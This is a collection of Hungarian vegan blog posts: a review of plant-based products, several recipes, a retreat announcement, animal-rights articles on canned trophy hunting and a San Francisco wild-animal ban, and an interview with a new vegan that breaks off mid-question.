Nem is olyan régen fedeztük fel a Provega-Trend Kft-t, először az általuk forgalmazott virsliket, majd egyéb húspótló termékeiket (tofu, szójafelvágottak, párizsik) fogyasztottuk először. Aztán találkoztunk a gyümölcscukros, teljes őrlésű vegán kekszekkel, és a rendkívül finom pástétomokkal. Honlapukra ellátogatva láttuk, hogy más egészséges finomságokat is terjesztenek. El is terveztük, hogy a cégvezetővel felvesszük a kapcsolatot, hogy lehetőségünk legyen népszerűsíteni termékeiket. Nyitott, gyors és készséges az ügyintézésük. A termékek pedig finomak, egészségesek és változatosak, nagyon széles termékkínálatuk van. 1. Kenhető vega krémek és növényi pástétomok: tömlős és konzerv kiszerelésben kaphatóak a tofuból és szójából készült pástétomok. Az előbbiből csicseriborsós, mexikói, francia ízesítésű kapható, mindegyik nagyon finom, kellemes. A mexikói enyhén csípős, így Fanni ezt nem ette (vagyis ette volna ezt is, de én nem engedtem :-). Emellett szójakrémet is vásárolhatunk náluk, zöldséges, tatáros, mexikói, natúr, tepertős ízesítésben. A növényi pástétomokból kapható brokkolis, gombás, babos, fokhagymás, pirospaprikás, tatáros. Mindhármunk nagy kedvenceivé vált, szinte az összes. Egyik pástétom sem drága, fehérjedús és rendkívül finom. 2. Vega virslik, felvágottak , párizsik és tofuk: Nem is tudom, melyik termékcsoporttal kezdjem, ezek a kedvenc kategóriáink. :-) A virslikből kapható natúr és chilis, mindkettő ízletes, finom, jó állagú, elég melegíteni őket. Leveles tésztába töltve finom csemege, de egytálételekben, rakott ételekben is fenséges. A párizsik, túristarudak ízletesek, kellően fűszeresek. A párizsik, felvágottak több ízben kaphatóak és nagyon ízletesek, az állaguk is rendkívül jók. A tofuk selymesek, pikáns ízesítésűek (pl. bazsalikomos), és egyáltalán nem semleges tofu-ízűek, hanem kellemes zamatúak. És jó árban kaphatóak ezek is. 3. Snack és keksz: Fanni nem édesszájú, ill. egyébként sem eszik cukrosat, csak maximum gyümölcsukros, stevi-ás, szirupos dolgokat. De ezeket a kekszeket nem tudta abbahagyni. Nagy adagok, finoman "fűszerezettek", kellemes ízűek és egészségesek! Mindig kell, hogy itthon legyen 1-2 doboz keksz. A citromos-kurkumástól féltünk a legjobban, de ez lett a legnagyobb kedvencünk. Nagyon finomak a kekszek önmagukban is,de házi karobos nutellával megtöltve ízletes, házi "pilóta kekszet" kapunk. 4. Instant kásák, pelyhek: A folyadékban feloldható termékek növényi tejjel, szójajoghurttal elkeverve azonnal fogyaszthatók. Használhatók sütéshez, főzéshez, habaráshoz, de reggeli gabonaételnek is megfelelőek. A piacon a hasonló jellegű termékek jóval drágábban szerezhetőek be. 5. Gluténmentes termékek : kenyérlisztek, tésztaalapok (pl. palacsintapor), instant levesek, pudingok több változatban kaphatók. És az ismertetés után egy JÓ HÍR: a blog olvasói minden termék árából 25 % kedvezményt kapnak! Ehhez a megrendelésbe annyit kell beleírni, hogy magdireceptek. Rendeléshez amennyiben igénylitek, tudok akciós árlistát küldeni, írjatok a magdolna.reisinger@gmail.com címre, de a cégvezető is szívesen ad felvilágosítást.
Csokis-kókuszos fagyi házilag
Oh my God! Az amerikaiak kedvenc szava járása... hát, amikor megkóstoltam az összeturmixolt fagyit, én is ezt mondtam. Sőt, amikor a fagyasztás során óránként átkevertem, mindig meg "kellett" kóstolni, és ekkor is csak ennyit tudtam mondani: Ez valami isteni. Krémes és kókuszos és csokis. A legjobb az, hogy nincs benne sem cukor, se egyéb nem oda való... és mégis finom lett!!! Mivel gyorsan kellett a gyerekeknek fagyi, így az alapanyagokat a DM-ben vettem meg. Az árakat elnézve, nem lett sokkal olcsóbb (kb. 130 Ft/gombóc) mint a cukrászdai, na de annál finomabb és egészségesebb. Hozzávalók (10 gombóc) - 20 dkg cukrozatlan datolya - 2,5 dl kókusztej - 2,5 dl kókuszkrém - 1 kávéskanál vaníliapor - 1 evőkanál cukrozatlan kakaópor Elkészítése: - A datolyát vágjuk fel kis darabokra, és áztassuk be a kókusztejbe. Legjobb, ha 1 éjszakát tud állni, de mivel én most elég puha datolyát vettem, így elég volt 3 óra puhulás. Mivel már a lakásban meleg van, így tegyük be a hűtőbe, hogy nehogy erjedés legyen belőle. - Amennyiben jól megpuhult a datolya, mindent tegyünk a turmixba, és dolgozzuk össze jó krémesre. - Tegyük egy edénybe, és mehet is a fagyasztóba. Én óránként habverővel átkevertem, kb. 5 óra elteltével volt olyan állaga, mintha fagyizóban vettem volna.
Egynapos elvonulás júniusban (jóga, meditáció, főzés) - 2015. június 20.
2015. június 1. Lét-tudatos konyha
- Zöld környezet, friss levegő, harmónia. - Árnyas fákkal körülvett, pozitív energiákat sugárzó hely, egy kis házikóval. - Kiváló atmoszférát biztosít szabadtéri jógára, meditációra. EGYNAPOS ELVONULÁS (jóga, meditáció, főzés) Egynapos programunk: - Salaktalanító gyógytea fogyasztása - Hatha jóga öngyógyító gyakorlatokkal - Vegetariánus ebédkészítés (leves, főétel, édesség) - Meditáció Időpont: június 20. szombat 8-16h Jelentkezési határidő: június 2. Ára: 7000 ft Jelentkezés és bővebb információ: renata.kalman_kukac_lettudatos.com tel.: 06 30 913 65 76 Ízelítő és képes beszámoló tavalyi programjainkból: itt és: itt
San Francisco betiltotta a vadállatok szerepeltetését
A város és a megye felügyeleti tanácsa egyhangúan megszavazta a vad és egzotikus állatok szerepeltetésének betiltását. Az intézkedés nem csak a cirkuszokra terjed ki - mint a többi amerikai városban -, hanem tovább megy, és a vadon élő állatok teljes körű kereskedelmi használatát tiltja, amibe beletartozik bármely nyilvános szórakoztatás, így a mozgóképipari termékek, a filmek, reklámok és a televíziós műsorok is. A rendelet nem vonatkozik a háziasított állatokra, például a kutyákra, macskákra, lovakra és egyéb háziállatokra. Az oktató vagy kiállító tevékenységet folytató szervezetek, az állatkertek és a múzeumok is mentességet élveznek.
A mi bazsalikom pestonk
2015. május 28. Zizi kalandjai
Rengeteg bazsalikom pesto recept van a neten, ez a mi receptünk, ahogy mi készítjük (természetesen vegán). Ádi annyira szereti, hogy mostanában hetente egyszer készítünk “peto tétát” – ő így mondja.
Néhány hete, amikor nekiálltam a bazsalikom pestos tészta készítésének, Ádi nyűgösködött, hogy foglalkozzak vele is, ezért úgy döntöttem, hogy neki adom a bazsalikom levelek letépkedésének feladatát. Ez izgalmas, számára újdonság és bevonom a főzésbe. Egész jól teljesítette a feladatot, persze segítenem kellett neki, hogy tökéletesen le legyenek tépkedve a levelek. Az ebéd elkészült és jól is laktunk. Majd néhány nappal később paradicsom palántákat ültettünk nagy cserepekbe, hogy Ádit kicsit bevezessem a kertészkedés művészetébe. Teljesen izgatott volt, mindent ő akart csinálni természetesen, de végre, ha nagy kupival is a hátunk mögött, elkészültünk. Másnap szellőztetés, erkélyajtó kinyit, én főzőcskézek, egyszer csak arra leszek figyelmes, hogy túl nagy a csend… Felfedeztem Ádit, amint tépkedi a paradicsom palánták leveleit és a földet is pakolja ki a cserepekből. Ááááááááááááá! De hát mit tanítottam neki néhány nappal korábban? A bazsalikomnak lehet a leveleit tépkedni, akkor a paradicsom palántának miért nem? Ezt egy két évesnek elég nehéz elmagyarázni. A lényeg, hogy a palánták megúszták, de az ablakpárkányokon végezték, ott nagyobb biztonságban vannak.
Állandóan mozgó modell, nehéz lencsevégre kapni
A pesto nálunk többnyire dióval készül, de ha éppen nincsen itthon, akkor mandulával csinálom és száraz serpenyőben kicsit meg is pirítom. A bazsalikomon kívül kerül még bele fokhagyma, só, bors, frissen facsart citromlé és jó minőségű extra szűz olívaolaj. Konyhai robotgépben csinálom, de sok szabadidővel rendelkezők megpróbálhatják mozsárban is pépesre törni. Mi mindig tésztával tálaljuk, de kenhetitek kenyérre is vagy tálalhatjátok tepsiben sült újburgonya mellé is.
Vegán bazsalikom pestos tészta
Hozzávalók 3 főre:
– 1 nagy csokor/cserép bazsalikom, levelei letépkedve
– 100 g dió vagy mandula
– 100 ml extra szűz olívaolaj
– 2 gerezd fokhagyma, megpucolva
– 1/2 citrom frissen facsart leve
– só, bors
– 300 g tészta
A diót száraz teflonserpenyőben 5-6 perc alatt pirítsuk meg. Tegyünk fel egy lábasban vizet forralni.
A megpirított diót tegyük az aprítógépbe, adjuk hozzá a fokhagyma gerezdeket, bazsalikom leveleket, olívaolajat, citromlevet és ízlés szerint sózzuk, borsozzuk. Dolgoztassuk az aprítógépet addig, amíg teljesen pépes lesz a pesto. Ha szükség van rá, adjunk még hozzá olívaolajat.
A tésztát főzzük ki al dente (fogkemény) állagúra a csomagoláson található utasítás szerint. Amikor leszűrjük, tegyünk félre kb. fél deci vizet belőle. A leszűrt tésztát keverjük össze az elkészült pestoval és egy kis tészta főzővízzel hígítsuk, hogy egészen krémes legyen az állaga és jól befedje a tésztát.
Eperkrémes torta (részben nyers)
Gyors, finom, epres. Sütni sem kell, csak turmixolni és keverni. Remek lehetőség, ha kevés időnk van, míg vendégek érkeznek, vagy vendégségbe indulunk. De ha csak valami finom, epres, egészséges édességre vágyunk, ami nem sok időt igényel, akkor ezt érdemes kipróbálni. Az útifűmaghéj, amitől zselés állagú lesz az eperlé, nagyon hasznos a bélrendszerünknek is. Egyfajta béltisztító hatása van. Az eper pedig B2-, B5-, B6-, C-vitaminban, magnéziumban, foszforban, káliumban és kalciumban gazdag gyümölcs, amelynek jelentős antioxidáns tartalma is van. Cukorbetegek számára is hasznos, mivel fogyasztását követően vércukor-csökkentő reakció megy végbe a szervezetünkben. Az eper különben a franciáknak köszönhetően terjedt el Európában. 1714-ben Chilében és Peruban talált rá egy francia mérnök, aki mintát hozva, elültette, s ezzel megkezdődött az európai termesztése.
A torta-alap receptje:
Hozzávalók:
25 dkg darált zabpehely
10 dkg kókuszreszelék
víz
2 érett banán vagy néhány szem felaprított, meleg vízben áztatott datolya
Elkészítés:
A zabpelyhet és a kókuszreszeléket egy tálban összekeverjük, villával szétnyomkodott banánt vagy felaprított, meleg vízben megpuhult datolyát keverünk hozzá, és annyi vizet öntünk rá, hogy az egészből egy nagy gömböcöt, egy golyót tudjunk gyúrni. Frissen tartó fóliával egy tortaformát kibélelünk (a fólia nagyobb legyen, mint a forma, a magasabb peremét is érje) és a zabpelyhes alapot beleformázzuk. Jól belenyomkodjuk. Az alábbi eperkrémet elkenjük rajta, majd ötletünk szerint dekoráljuk. Ahogy a képen is látható, csokis szósz került a tetejére. (Eperrel már nem tudtam díszíteni.)
Az eperkrém receptje:
Hozzávalók:
- 1 nagy bögrényi (min. 4 dl) nagyon érett eper vagy szamóca (fagyasztott is lehet)
- meleg vízben áztatott datolya (kb 1/3 bögrényi)
- max. 1 dl víz
- útifűmaghéj
Elkészítés:
Vegyük elő a turmixgépet (vagy egy erős aprítógépet) és a fentieket az útifűmaghéj kivételével tegyük bele. Indítsuk el, és ha az eperből kész a sűrű eperlé, eperszósz, akkor kb 3-4 evőkanálnyi útifűmaghéjjal is turmixoljuk össze. Hagyjuk állni, kb. negyed óra múlva kenhető állagú krém lesz belőle. Ha nem elég szilárd ahhoz, hogy kenni tudjuk, még némi útifűmaghéjat keverjünk hozzá. A kész krémet egyszerűen elkenjük a zabpehelyből készült tésztán. Hűtőben tároljuk tálalásig. Tálalás előtt a fóliával kiemeljük a formából, lehúzzuk alóla a fóliát, és elképzelésünk/időnk szerint díszítjük. Nagyon kiadós torta olyan értelemben, hogy nem sokat bír az ember belőle enni még akkor sem, ha édességfüggő.u
Kókuszzsírt (folyékony állagú) egy kevés nyírfacukorral, karobbal és kevés kakaóval kikevert "csokiszósz"-t folyattam a tetejére. Erre volt időm, mielőtt elindultunk volna a vendégségbe, ahova magunkkal vittük ezt az egészséges finomságot.
Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán)
Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán) Nem tudom ti hogy vagytok vele, de mi télen sokkal több levest eszünk, mint nyáron. Valószínűleg az is az oka, hogy nyáron több lédús gyümölcsöt és friss zöldséget fogyasztunk, ezért nincs szükségünk plusz folyadék bevitelre leves formájában. Ez nem azt jelenti, hogy egyáltalán nem kívánjuk a levest, de sokkal ritkábban. A magyarok egyébként is nagy leveses nemzet hírében állnak, összehasonlítva az átlag európai étkezési szokásokkal. Egy magyar menüsor elképzelhetetlen leves nélkül! A hideg időkben főleg tápláló krémleveseket készítek, amik jól felmelegítenek minket. ;-) Tavasszal és nyáron pedig inkább a hagyományos "lé és rágnivaló" leveseket kívánjuk meg. Ma egy ilyen, pak choi leves receptet hoztam, mely valójában egy könnyen és egyszerűen elkészíthető zöldségleves, telis tele értékes zöldségekkel. Egy hűvös nyári estén szívesen kanalazgatunk ehhez hasonló leveseket. És te? Mennyire szereted a leveseket? Pak Choi A pak choi-t, vagy bordáskelt sokszor azonosítják a kínai kellel is, de mára már a pak choi elnevezés a magyar nyelvben is elterjedté vált. A káposztafélék családjába tartozó pak choi Közép-Kelet-Ázsiából származik. Termesztésével több, mint hatezer éve foglalkoznak Kínában. "A kínaiak egyetlen szóval sokféle zöldségre utalhatnak: "choi" (ejtsd:csoj). Pak Choi talán a legismertebb Choi féle, mivel különböző egzotikus szupermarketeken már könnyen beszerezhető. Káposztafélék családjába tartozik, és többféle néven is szokták emlegetni: bok choi, fehér mustár káposzta, ló füle, kínai zeller káposzta. A törzs fehér része édeskés, "ropogós", míg a zötét zöld levelei puhábbak és enyhén kesernyések. Igazán sokoldalú zöldségféle! Stir fry ételekhez felhasználható, vagy párolt vegyes tálakhoz, de önmagában is tálalható, mint egy zöldség-étel. Az íze valahol a káposzta és spenót közé esik. Van egy bébi változata is, ami még édesebb! A bébi pak choi-t néha nyersen is eszik, de a legjobb ha enyhén párolt/gőzölt. A pak choi növény gyakran szimbolizál Kínában jólétet és gazdagságot. A szó fordítása értelmezhető úgy, hogy százféle jóság/vagyon. Kínai új év idején nem véletlenül kerül az ünnepi asztalra!" Forrás: Ízek Kelet London HOZZÁVALÓK: (kb. 8 adaghoz) - 2 l tiszta víz - 4 db bio leves kocka - 1/2 piros pritamin paprika kis kockákra vágva - 1 db lila hagyma 4 részre vágva - 3 db gerezd fokhagyma egészben - 150 g kukorica (nem cukrozott konzerv, vagy fagyasztott) - 1 szál tavaszi hagyma darabokra vágva (kb.1 cm-esek) - 2 db pak choi feldarabolva (kb.6-7 cm-es darabokra) - 1 marék friss petrezselyem - 1 ek világos szójaszósz - 1 db nagyobb sárgarépa vékonyra karikázva - 1 db kisebb fehérrépa - Himalája só, frissen őrölt fekete bors - (opcionálisan pl.: cukkini, brokkoli, zeller, egyéb zöldségek) - 4 "fészek" kínai noodle tészta (gluténmentes) Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán) ELKÉSZÍTÉS: Tegyük fel a vizet forrni egy nagy lábasban. Mielőtt forrni kezdene szórjuk bele a bio leves kockákat, és sárgarépa karikákat. Forrás után kb. 10 perccel, adjuk hozzá a zöldségeket: paprika, lila hagyma, fokhagyma, kukorica, tavaszi hagyma, petrezselyem, és a pak choi. Közepes lángon, fedő alatt főzzük, amíg a répa el nem kezd puhulni. Max. 30 perc alatt ehetőre puhul a répa is, és még a zöldségek sem főnek szét. A noodle tészták zacskóiban 6-10 db tészta "fészek" található. 1 db noodle fészek kb. 2 főnek elég, ha szeretjük sok tésztával enni a levest. :-) A noodle tésztákat külön főzzük meg, mint a hagyományos tésztákat, kb.8 perc alatt (lásd a tészta csomagoláson). (Fedő alatt, forrásban lévő sós vízben, 1 ek olajjal.) A megfőtt noodle tésztákat csak közvetlen a fogyasztás előtt tegyük a leveses tányérunkba, hogy ne tűnjön el a leves , mert a tészta magába szívhatja a folyadékot. És ennyi! Ilyen egyszerűen elkészíthető ez a leves. Természetesen a zöldségeket a saját ízvilágunk szerint változtathatjuk. Zöldségleves Pak Choi-jal (gluténmentes, laktózmentes, vegán) Tápanyagban gazdag jó étvágyat kívánunk! :-) Megjegyzés: Ma már sokféle noodle tésztát lehet kapni. Létezik teljeskiőrlésű, gluténmentes noodle és rizstésztából is láttam már. Válasszunk kedvünk szerint! ;-)
Győri édes, avagy vaníliás keksz csokidarabokkal
A gyerekeim egyfolytában kekszet ropogtatnának, sajnos a rosszabbik fajtából. Nos, olyan kekszet sikerült sütnöm, mely kellően ropogós, édes és egészséges is. Hozzávalók: - 25 dkg teljes kiőrlésű tönkölyliszt - 10 dkg fehér tönkölyliszt vagy BL80-as liszt - 10 dkg darált dió - 15 dkg kókuszvirágcukor - 1 csomag sütőpor - 1 kávéskanál vaníliapor - 10 dkg bio vagy házi vaj - 10 dkg kókuszzsír - 60-70 ml növényi tej - fél tábla étcsoki - 4-5 csepp narancsolaj - csipet só - Tetejére: nyers csoki Elkészítése: - Kimérem a lisztet, hozzáadom a többi száraz hozzávalót is. Szétmorzsolom benne a kókuszzsírt és a vajat, majd apránként adagolom hozzá a tejet. - Könnyen gyúrható, puha tészta legyen. Beteszem a hűtőbe úgy 1 órára. - Előmelegítem a sütőt 180 fokra. - A tésztát 2-3 mm vastagra kinyújtom, és kiszaggatom. 180 fokon, 10-12 perc alatt kisütöm. - Hagyom kihűlni, majd a tetejét megcsorgatom csokival.
Paprikakrémes pirított burgonya avokádós uborkasalátával
Imádom a paprika édességét, a krumpli ropogósságát és a saláta frissességét. Tökéletes étel ebédre, vagy akár vacsorára is. Hozzávalók (2 adag): - 2 marék kockára vágott krumpli - 1 szelet kápia paprika - 2 újhagyma - himalája só - kókuszolaj Paprikakém: - 1 nagyobb kápia paprika - 2 gerezd fokhagyma - 1 újhagyma - himalája só, bors, chili - kókuszolaj Saláta: - 4-5 uborka - 1 kisebb fehér retek - 1 újhagyma - 1/2 avokádó - 1 kávéskanál mustár - himalája só - citromlé Elkészítése: Egy serpenyőben felhevítjük az olajat, majd beledobjuk a krumplit. (Ha többet szeretnénk készíteni, akkor tepsiben is megsüthetjük.) Sózzuk meg.Amikor már szépen pirul a krumpli, adjuk hozzá a felkockázott hagymát és a paprikát. Süssük még együtt úgy 10 percig.A paprikakrémhez a kápia paprikát szeleteljük fel, majd egy serpenyőbe süssük meg. Egy kevés olajat tehetünk alá, és meg is sózhatjuk. A fokhagymát is adjuk mellé.Amikor szépen megpirult/megpuhult a paprika, botmixerezzük össze a fokhagymával és az újhagymával. Sózzuk, borsozzuk.Tálalás előtt keverjük össze a krumplival.A salátához gyufaszálra vágjuk az uborkát és a retket. A puha avokádót gyúrjuk hozzá. Sózzuk, adjuk hozzá a mustárt és a felszeletelt újhagymát.
Trófeának született - vadállatok, mint haszonállatok
Az emberiség történelmét végigkísérte a vadonélő állatok imádása, leigázása és megölése. Szépségük, különlegességük, cukiságuk, veszélyességük miatt kerülnek rács mögé vagy fegyverek célkeresztjébe. Számos mód kínálkozik arra, hogy tömegek élhessék ki az állatok számára súlyos következményekkel járó szenvedélyt. Többek közt állatkertek, vadasparkok, cirkuszok, delfináriumok, vadászatok. Bár a helyszín és az állatok változnak, a lényeg ugyanaz: az egyenlőtlen erőviszonyok megteremtése állat és ember között, az állatok kiragadása természetes élőhelyükről, szaporulatuk, viselkedési formáik kihasználása vagy megváltoztatása a profit érdekében, nem más, mint a haszonállat életciklusa.
A canned hunt (konzerv vadászat), a trófea vadászat (szórakozásból ölés) egyik válfajaként ennek egy különösen kegyetlen és alantas módja. A prédaállatokat zárt, kerítéssel körbevett területen vadásszák - innen ered a név-, ahol esélyük sincs a menekülésre. Elsősorban az oroszlánszaporító iparágat hozzák összefüggésbe vele, de más vadászati formákhoz hasonlóan, minden állat veszélyeztetett, amely kereskedelmi értékkel bír. Íme, néhány terítékre kerülő faj: leopárdok, gepárdok, páviánok, orrszarvúk, vízilovak, zebrák, sakálok, elefántok, dámvadak, zsiráfok, hiúzok, antilopok, bivalyok, struccok, varacskos disznók, tigrisek. Mindenre lőnek, ami mozog. Az USA legalább 25 államában vadászhatnak egzotikus fajokra, de az üzlet a világ számos országában virágzik. Vadfarmok mellett cirkuszok, vadasparkok, szafariparkok és állatkertek is értékesítik közvetítőkön keresztül a kiöregedett állatokat vagy a fölösleges szaporulatot, vadászat céljára.
Kerítés mögött - halálra ítélve
2005-ben John Lockwood Texasban webkamerák és távirányítható fegyverrendszer felhasználásával létrehozta az úgynevezett internet huntingot. Ez lehetővé tette, hogy a ,,vadászok a számítógép előtt ülve lőjék ki az állatokat (Click&Kill). Az állatvédő szervezetek mellett a fegyvertartást és a vadászatot támogató National Rifle Association és a Safari Club International is heves tiltakozásba kezdett. Végül 2008. augusztusában 40 államban betiltották a távirányított vadászatot.
A bizniszben több közép és nyugat-afrikai ország, valamint Dél-Afrika is érdekelt. Ez utóbbi a zárt területen végzett vadászat Mekkája. Érdemes közelebbről megnézni, hogyan működik a rendszer. Közel 160 vadfarm szaporítja az állatokat. A fogságban tartott oroszlánok száma megközelíti a 8000 példányt, miközben a túlnépesedés miatt gyors ütemben zsugorodó vadonban mindössze 4000 állat él szabadon. A szerteágazó nemzetközi kapcsolatokkal rendelkező, maffia-szerű iparág a felnevelt szaporulatot elsősorban vadászat céljára adja el. Ezenkívül értékesít vadasparkoknak, állatkerteknek, magángyűjtőknek, és az egzotikus állatok feketepiacán a hagyományos ázsiai orvoslás illegális gyógyszerkartelljei is tőlük vásárolnak.
A legjobb üzleteket azonban a vadászokkal kötik. Egy hím kilövése több mint 35.000 dollárt (10,6 millió Ft) is megér a trófea vadásznak (egy vadon élő oroszlán kilövéséért ennek a dupláját is elkérik). Dél-Afrikának 2012-ben 807 millió rand, durván 70 millió dollár bevétele volt a zárt területen végzett vadászatból. Az sem állítja meg a puskákat, ha a faj súlyosan veszélyeztetett, vörös listán van. Sőt, az ipar képviselői és az állatgyilkolás rajongói azzal védekeznek, hogy jobb ha a "stabilan szaporodó" tenyésztett állatok kilövésében élik ki a vadász szenvedélyüket, mintha a természetes vadállományt ritkítanák tovább.
Turisták és állatvédők - vadászok szolgálatában
A vadászat prédaállatait szállító farmok szaporítótelepként és szórakoztatóipari létesítményként funkcionálnak (akárcsak a többi, állatokat fogva tartó intézmény). Elzárt területeken tartják a szaporításra, eladásra, kilövésre szánt példányokat. Nem ritka, hogy a zsúfoltság és a beltenyészet miatt betegségek tizedelik az állományt. A látogatók elől rejtve zajlanak az állatkihasználás visszataszító mozzanatai, például a nőstény oroszlánok erőszakos megtermékenyítése, évi három alkalommal. A rácsok mögé születő kölyök nem a falkát, a faj genetikai variabilitását, az ökoszisztémát erősíti, hanem tulajdonosa bankszámláját hizlalja.
Az önkéntes emberkézhez szoktatja a fehér oroszlánkölyköket. Nem lesz nehéz levadászni őket
A kassza pedig gyakran csenget, ugyanis Dél-Afrika a világ 21. legnépszerűbb turista célpontja, GDP-jének 9%-a és minden 12. munkahely az idegenforgalomból származik. Turisták tömegei számára különleges attrakció a farmok kölyöksimogatója. Különösen kedveltek a kék szemű, fehér oroszlánok. A kölyköket néhány dollárért fényképezhetik, etethetik, kényeztethetik, sétáltathatják. A vadonban a természetellenes aktusért az életükkel fizetnének. Bár olcsó és ártatlannak tűnő szórakozás az állatok későbbi legyilkolásához képest, az oroszlánok vadászatra kondicionálása itt kezdődik el. Ahogy más haszonállatok esetén itt is tudatosan veszik el őket az anyjuktól rögtön a születésük után. A cél az, hogy megszokják az emberek jelenlétét. Mesterséges táplálékkal, cumisüvegből etetik őket, hogy erősítsék a kötődést. Gyakran konzervációs programként, vadvédelmi központként állítják be a tevékenységüket. Az ,,átpozícionálás tökéletesen működik. A kéthetes turnusokban érkező lelkes önkéntesek 2000-3000 dollárt fizetnek a felejthetetlen állatvédelmi élményért, miközben a vadászok számára szelídítik a későbbi prédát. A farmok az állatkihasználás mesterei, minden egyes dollárt kipréselnek az állatokból, mielőtt megölik őket.
A vadonban ezért az életükkel fizetnének a fiatalok, de így csak néhány dollárba kerül
Egzotikus, vadon élő állatok fogságban tartását és megölését támogatod, ha a canned huntot, vagy más vadászati formákat népszerűsítő, támogató utazási irodák, utazásszervezők, hotelek, vállalkozások szolgáltatásait igénybe veszed. Vadasparkokat, szafari parkokat, állatkerteket, állatos cirkuszokat, akváriumokat, delfináriumokat látogatsz. Vadhúst forgalmazó üzletekben, éttermekben, trófeával, állati testrészekkel kereskedő cégeknél vásárolsz. Állati bőrt, szőrmét viselsz, állati szöveteket tartalmazó ékszerekkel és használati tárgyakkal veszed körbe magad.
Nincs kegyelem
A canned hunt 100%-os sikert garantál a vadászok számára, ehhez azonban gondosan előkészített terepre van szükség. Nem elegendő, hogy a látszólag hatalmas és veszélyes állat fogságban született, emberhez szoktatott és szelíd. A sokszor dzsipek tetejéről pufogtató műkedvelők ,,közös ketrecbe zárják magukat a náluknál sokkal erősebb vadállatokkal, hogy azok véletlenül se menekülhessenek. A támadás kiküszöbölésére megpróbálják lekötni az egyébként alultáplált állatok figyelmét fákra aggatott élelemmel, túletetéssel. Az sem ritka, hogy erős nyugtatókkal szedálják könnyen vadászhatóvá őket, de a legextrémebb esetben szűk ketrecbe zárt állatokat lőnek agyon. A konzerv vadászathoz általában nem szükséges vadászengedély. Ritkán esik meg, hogy az állattal egyetlen lövés végez. A modern íjakkal, nagy kaliberű távcsöves puskákkal, számszeríjjakkal, kézifegyverekkel teleaggatott tapasztalatlan vadászok ügyetlensége miatt általában hosszú haláltusát vívnak az állatok. Ha valaki annyira ügyetlen, hogy el sem találja a prédát, akkor a mellé kirendelt "túravezető" lövi le az állatot.
Családi idill meggyilkolt zsiráffal
A leterített és immár veszélytelen vad mellett elkészülnek az első fényképek. Mindössze 3-4 hetet kell várnia a vadásznak, hogy az állat teste alkalmassá váljék a feldolgozásra. A taxidermia (preparálás) a vadászat virágzó melléküzletága, mely során a tetemet konzerválják, különböző trükkök segítségével szinte élővé varázsolják és a kívánt pózba merevítik.
2007-2012 között 47 db Dél-Afrikában kilőtt oroszlán trófeájára kértek kiviteli engedélyt magyar trófeavadászok.
Időről-időre felbukkannak fotók a leölt állatokkal pózoló vadászokról, az interneten, de biznisz nem torpan meg a hangos tiltakozás ellenére sem. Sőt, évről évre mind több bevételt hoz a szaporítóknak, a preparátoroknak, a vadászati kellékek, vadászfegyverek gyártóinak, az ipart kiszolgáló hivatásos vadászoknak, az idegenforgalomnak és adók formájában az országnak, amely elnézi és támogatja a mészárlást. Bár egyes országok, mint például Ausztrália megtiltották az oroszlán testrészek importálását, az Európai Unió pedig korlátozza a nem fenntartható vadászatból származó trófea behozatalt, a canned hunt áldozatait ez sem védi meg az emberektől. Egyelőre ugyanis legális és fenntartható üzletnek tekintik.
Mentás Eper smoothie
Ha május akkor eper minden mennyiségben. Kettő az egyben, mert nemcsak az epret szeretem, hanem a különböző turmixokat, smoothiekat. Ideálisak több szempontból, ugyanis indíthatjuk velük a reggelt. A friss gyümölcsök nemcsak vitaminokat, hanem sok vizet és gyümölcscukrot is tartalmaznak, amelyet délelőtt könnyen lebont a szervezet és kellő energiát ad. Továbbá kiválthatjuk velük a szénhidrátdús édességeket, ha hidegen készítjük akár a fagylalt utáni sóvárgásunk is csökkenthetjük. Telítenek, sok rostot tartalmaznak, beilleszthetőek bármelyik fogyókúrába, diétába. A kulcs az összetevőkben rejlik.
Az eper alapvetően egy alacsony cukortartalmú gyümölcs. Arra figyeljünk, hogy a gyümölcsöket ne keverjük állati tejtermékkel, mert a gyümölcsök önmagukban is képesek erjedni, a magas fehérjetartalmú tehéntejjel, pedig inkább nem részletezem, hogy mi lesz a bélrendszerünkben. Válasszunk növényi tejeket: mandula, kókusz,-rizstejet akár. Édesíthetjük kevés mézzel, steviával, kókuszcukorral, eritrittel. Erjedésgátló fűszerről sem feledkezzünk meg: fahéj, gyömbér vagy bourbon vanília. Még egy szabály amely a gyümölcsétkezéshez tartozik: maximum kétféle gyümölcsöt mixeljünk!
Semmi másra nincs már szükségünk csak egy konyhai turmixgépre, vagy botmixerre.
Hozzávalók:
1 marék friss eper/fő
2 dl rizstej, vagy mandulatej/fő
1 evőkanál kókuszcukor/fő
pár csepp friss citromlé
késhegyni őrölt bourbon vanília
pár levél friss menta
3-4 db jégkocka
Az összetevőket összeturmixoljuk. Praktikus és ideális ha csavaros üvegbe öntjük, így könnyedén magunkkal is vihetjük. A citromlé és a jég gondoskodik, hogy tovább friss maradjon az italunk a nyári melegben.
,,A vegánságnak alapvetőnek kellene lennie – interjú Dáviddal
Mióta vagy vegán? Meddig leszel vegán?
Másfél hónapja és életem végéig.
Hogyan jött ez a döntés?
Morrissey nyitotta fel a szemem. Ő egy vegán énekes, a The Smiths frontembere volt, de szólóként is nagy sikert aratott, és még mindig aktív. Decemberben voltam egy koncertjén, ahol láttam és hallhattam a Meat is murder című számát. Nagyon elgondolkodtatott, és december 29-én vegetáriánus lettem. Addig információkat kerestem. A vegaság az egyszerűnek mondható, de a vegánság már szeritem nehezebb, és félrelépés nélkül szerettem volna belekezdeni, ami eddig sikerült is legjobb tudásom szerint.
Mi lenne a személyes, egymondatos definíciód arra, hogy vegán?
Nem eszem húst és állati eredetű ételeket, elkerülöm a bőr és szőrme termékeket, és igyekszem állatkísérletmentes termékeket használni. Egyébként a vegánságnak annyira alapvetőnek kéne lennie, mint amennyire a húsevés most az.
Hogyan viszonyultak ehhez a döntéshez a szűkebb környezetedben? Család/munka-tanuló környezet? Barátok?
A családom tökéletesen megfelel a húsevő sztereotípiáknak, kivéve édesanyámat, aki bár folytatja az életmódot, de gyakran főz nekem vegán ebédet. És nincs túl sok barátom, de az egyik legjobb barátommal nagy Morrissey-rajongók vagyunk, vele voltam azon a koncerten, melynek hatására ő is vegán lett, így vele változatlan maradt a kapcsolatom.
Mi tanácsolnál a 0. napos vegán önmagadnak?
Azt, hogy gondolkodjon előre, mit fog enni, mert könnyen éhes lesz nap végére.
És mit kérdeznél a 10. éve vegán önmagadtól?
